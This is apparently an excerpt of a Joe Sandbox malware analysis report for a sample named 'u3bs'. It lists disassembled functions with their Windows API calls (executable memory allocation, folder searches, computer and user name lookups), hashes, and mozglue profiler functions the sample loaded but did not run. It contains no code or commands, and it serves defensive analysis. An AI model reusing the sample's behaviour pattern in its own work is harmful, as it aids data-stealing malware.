Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412ABA
lstrcat.KERNEL32(?,04338740), ref: 00412AD8

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 97b66dd004d6f90ad905e58048b9a9502992b30ed52752b18a3823e362e2cc13
Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
Opcode Fuzzy Hash: 97b66dd004d6f90ad905e58048b9a9502992b30ed52752b18a3823e362e2cc13
Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4998d78665a182cfe3f098699877b2c6e461f8b8b8b3f763f93a82d2c629cf92
Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
Opcode Fuzzy Hash: 4998d78665a182cfe3f098699877b2c6e461f8b8b8b3f763f93a82d2c629cf92
Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,043306D0,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

ExitProcess.KERNEL32 ref: 00401186

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FF8

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6B0BF070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B0BF09B

Part of subcall function 6B095B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6B0956EE,?,00000001), ref: 6B095B85
Part of subcall function 6B095B50: EnterCriticalSection.KERNEL32(6B0FF688,?,?,?,6B0956EE,?,00000001), ref: 6B095B90
Part of subcall function 6B095B50: LeaveCriticalSection.KERNEL32(6B0FF688,?,?,?,6B0956EE,?,00000001), ref: 6B095BD8
Part of subcall function 6B095B50: GetTickCount64.KERNEL32 ref: 6B095BE4

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6B0BF0AC

Part of subcall function 6B095C50: GetTickCount64.KERNEL32 ref: 6B095D40
Part of subcall function 6B095C50: EnterCriticalSection.KERNEL32(6B0FF688), ref: 6B095D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6B0BF0BE

Part of subcall function 6B095C50: __aulldiv.LIBCMT ref: 6B095DB4
Part of subcall function 6B095C50: LeaveCriticalSection.KERNEL32(6B0FF688), ref: 6B095DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6B0BF155
GetCurrentThreadId.KERNEL32 ref: 6B0BF1E0
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF1ED
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF212
GetCurrentThreadId.KERNEL32 ref: 6B0BF229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0BF231
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6B0BF248
GetCurrentThreadId.KERNEL32 ref: 6B0BF2AE
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF2BB
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF2F8

Part of subcall function 6B0ACBE8: GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
Part of subcall function 6B0ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA

Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F

GetCurrentThreadId.KERNEL32 ref: 6B0BF350
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF35D
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF381
GetCurrentThreadId.KERNEL32 ref: 6B0BF398
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0BF3A0
GetCurrentThreadId.KERNEL32 ref: 6B0BF489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0BF491

Part of subcall function 6B0B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6B0B94EE
Part of subcall function 6B0B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6B0B9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6B0BF3CF

Part of subcall function 6B0BF070: GetCurrentThreadId.KERNEL32 ref: 6B0BF440
Part of subcall function 6B0BF070: AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF44D
Part of subcall function 6B0BF070: ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF472

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6B0BF4A8
GetCurrentThreadId.KERNEL32 ref: 6B0BF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0BF561
GetCurrentThreadId.KERNEL32 ref: 6B0BF577
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF585
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF5A3

Strings

[I %d/%d] profiler_resume_sampling, xrefs: 6B0BF499
[I %d/%d] profiler_pause_sampling, xrefs: 6B0BF3A8
[I %d/%d] profiler_resume, xrefs: 6B0BF239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6B0BF56A

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 565197838-2840072211
Opcode ID: 0eb5924a563fe4e83cd11689b9bddec906cb3ea81c95695dba8bfa5a46213eed
Instruction ID: 52d4e661df5a5433e5da5eddafc78fb854c209eb2beae7befc16050a09433877
Opcode Fuzzy Hash: 0eb5924a563fe4e83cd11689b9bddec906cb3ea81c95695dba8bfa5a46213eed
Instruction Fuzzy Hash: 28D11735B042049FDB089F78E48575A7FEDEB86368F00052AED5983381DB79E805CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6B0BE2F0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 466threadCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,6B0BE2A6), ref: 6B0BE35E
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6B0BE2A6), ref: 6B0BE386
GetCurrentThreadId.KERNEL32 ref: 6B0BE3E4
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6B0BE4AB
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE4F5
GetCurrentThreadId.KERNEL32 ref: 6B0BE577
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE584
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6B0BE8A6

Part of subcall function 6B07B7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6B07B7CF
Part of subcall function 6B07B7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6B07B808

Part of subcall function 6B0CB800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6B0F0FB6,00000000,?,?,6B0BE69E), ref: 6B0CB830

memset.VCRUNTIME140(?,00000000,00000000), ref: 6B0BE6DA

Part of subcall function 6B0CB8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6B0CB916
Part of subcall function 6B0CB8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6B0CB94A

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6B0BE864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BE883

Strings

MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6B0BE777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6B0BE722, 6B0BE750, 6B0BE7A2
MOZ_PROFILER_STARTUP, xrefs: 6B0BE5A1, 6B0BE5CC, 6B0BE5FF, 6B0BE62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6B0BE655
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6B0BE826, 6B0BE850

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 2698983630-53385798
Opcode ID: 40d78cf811aaeca63d682548aed731cb4911d7065199bfe36e167fa4de1180df
Instruction ID: 452478d632dd871955a378a34693a410a55782555411e4537135fc831fb750e2
Opcode Fuzzy Hash: 40d78cf811aaeca63d682548aed731cb4911d7065199bfe36e167fa4de1180df
Instruction Fuzzy Hash: B3027A75A003059FCB18CF28D484B6ABFE9FF89304F0449ADE95A97341DB39E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6B087810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6B0FE744), ref: 6B087885
LeaveCriticalSection.KERNEL32(6B0FE744), ref: 6B0878A5
EnterCriticalSection.KERNEL32(6B0FE784), ref: 6B0878AD
LeaveCriticalSection.KERNEL32(6B0FE784), ref: 6B0878CD
EnterCriticalSection.KERNEL32(6B0FE7DC), ref: 6B0878D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6B0878E9
EnterCriticalSection.KERNEL32(00000000), ref: 6B08795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6B0879BB
LeaveCriticalSection.KERNEL32(?), ref: 6B087BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6B087C82
LeaveCriticalSection.KERNEL32(6B0FE7DC), ref: 6B087CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6B087DAF

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID:
API String ID: 759993129-0
Opcode ID: bcf1e6e029c0edc72ea1572fb1ab792c5316ec901769eecc9f550fe34815a645
Instruction ID: 81fa2cd4d0ef5768a51f091b02c198e667ffa1f8c13cf6378ad67ad502b78b47
Opcode Fuzzy Hash: bcf1e6e029c0edc72ea1572fb1ab792c5316ec901769eecc9f550fe34815a645
Instruction Fuzzy Hash: E7025D71A0421A8FDF58CF18C984799BBB6FF88314F5582EAD809A7315D734AE91CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B5190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6B0B51DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6B0B529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6B0B52FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6B0B536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6B0B53F7

Part of subcall function 6B0AAB89: EnterCriticalSection.KERNEL32(6B0FE370,?,?,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284), ref: 6B0AAB94
Part of subcall function 6B0AAB89: LeaveCriticalSection.KERNEL32(6B0FE370,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284,?,?,6B0956F6), ref: 6B0AABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6B0B56C3
__Init_thread_footer.LIBCMT ref: 6B0B56E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6B0B56BE

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: 42ca59dda2151b6df05d4155409ed93129a2bfbfc0d5a7544c986c3fe2f3efb7
Instruction ID: ea22b4aedcde03980a4803d7641129f798bc7198f86e1f1d2f0b88aecadbf802
Opcode Fuzzy Hash: 42ca59dda2151b6df05d4155409ed93129a2bfbfc0d5a7544c986c3fe2f3efb7
Instruction Fuzzy Hash: 68E19F75914F458AC716CF34C86022BBBFABF9B780F109B4EE8AF2A551DB35E0468701

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D7030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6B0D7046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6B0D7060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6B0D707E

Part of subcall function 6B0881B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6B0881DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6B0D7096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6B0D709C
LocalFree.KERNEL32(?), ref: 6B0D70AA

Strings

### ERROR: %s: %s, xrefs: 6B0D7087
(null), xrefs: 6B0D706A, 6B0D7083

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: cd5fc0283004880afd4f4fdf622289b952dde812de9a1ba0013b4c9fe22c20ce
Instruction ID: c6d55e4ce2226cfd0d1f854e09918b6e9bb46926af35b2f174671928708feed6
Opcode Fuzzy Hash: cd5fc0283004880afd4f4fdf622289b952dde812de9a1ba0013b4c9fe22c20ce
Instruction Fuzzy Hash: B50156B2A00108ABDF046BA4EC4AEAF7FACEF49255F050425FE06A7141E675E9148BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6B0DB910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

